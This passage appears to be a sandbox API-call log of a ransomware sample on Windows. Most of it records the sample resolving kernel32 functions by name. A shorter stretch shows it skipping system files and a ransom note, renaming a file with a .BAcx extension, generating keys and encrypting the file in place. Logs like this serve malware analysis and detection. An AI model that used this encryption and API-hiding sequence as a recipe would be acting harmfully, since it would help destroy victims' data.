lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.398] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.398] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.398] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.398] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.398] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.398] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.398] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.398] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.398] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.398] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.398] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.398] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.398] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.398] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.398] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.399] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png") returned 63 [0082.399] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png.BAcx") returned 68 [0082.399] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qd1ysnso4kvgu.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png.BAcx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qd1ysnso4kvgu.png.bacx"), dwFlags=0x0) returned 1 [0082.399] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.400] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.400] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.400] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99073520, ftCreationTime.dwHighDateTime=0x1d4cb22, ftLastAccessTime.dwLowDateTime=0x7088c80, ftLastAccessTime.dwHighDateTime=0x1d4c732, ftLastWriteTime.dwLowDateTime=0x7088c80, ftLastWriteTime.dwHighDateTime=0x1d4c732, nFileSizeHigh=0x0, nFileSizeLow=0x10ce6, dwReserved0=0x0, dwReserved1=0x0, cFileName="QWFtZKG5zhLN.swf", cAlternateFileName="QWFTZK~1.SWF")) returned 1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="DECRYPT-FILES.txt") returned 1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="autorun.inf") returned 1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="boot.ini") returned 1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="desktop.ini") returned 1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="ntuser.dat") returned 1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="iconcache.db") returned 1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="bootsect.bak") returned 1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="ntuser.dat.log") returned 1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="thumbs.db") returned -1 [0082.400] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf", lpString2="Bootfont.bin") returned 1 [0082.400] lstrlenW (lpString="QWFtZKG5zhLN.swf") returned 16 [0082.400] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0082.400] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0082.400] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0082.400] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0082.400] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.400] lstrlenW (lpString="QWFtZKG5zhLN.swf") returned 16 [0082.400] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.401] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="QWFtZKG5zhLN.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf" [0082.401] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qwftzkg5zhln.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.401] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=68838) returned 1 [0082.401] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.401] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.401] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.401] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.401] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.402] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.402] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.403] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.403] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.404] CloseHandle (hObject=0x444) returned 1 [0082.404] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.404] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.405] CloseHandle (hObject=0x0) returned 0 [0082.405] CloseHandle (hObject=0x440) returned 1 [0082.405] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.405] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.405] GetTickCount () returned 0x114d134 [0082.405] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.406] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.406] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.406] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.406] lstrlenA (lpString="kernel32.dll") returned 12 [0082.406] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.406] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.406] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.406] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.407] lstrlenA (lpString="ADDATOMA") returned 8 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.407] lstrlenA (lpString="ADDATOMW") returned 8 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.407] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.407] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.407] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.407] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.407] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.407] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.407] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.407] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.407] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.407] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.407] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.407] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.407] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.407] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.407] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.407] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.407] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.408] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.408] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.408] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.408] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.408] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.408] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.408] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.408] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.408] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.408] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.408] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.408] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.408] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.408] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.408] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.408] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.408] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.408] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.408] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.409] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.409] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.409] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.409] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.409] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.409] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.409] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.409] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.409] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.409] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.409] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.409] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.409] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.409] lstrlenA (lpString="BEEP") returned 4 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.409] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.409] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.409] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.409] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.410] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.410] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.410] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.410] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.410] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.410] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.410] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.410] lstrlenA (lpString="CANCELIO") returned 8 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.410] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.410] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.410] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.410] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.410] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.410] lstrcpyA (in: 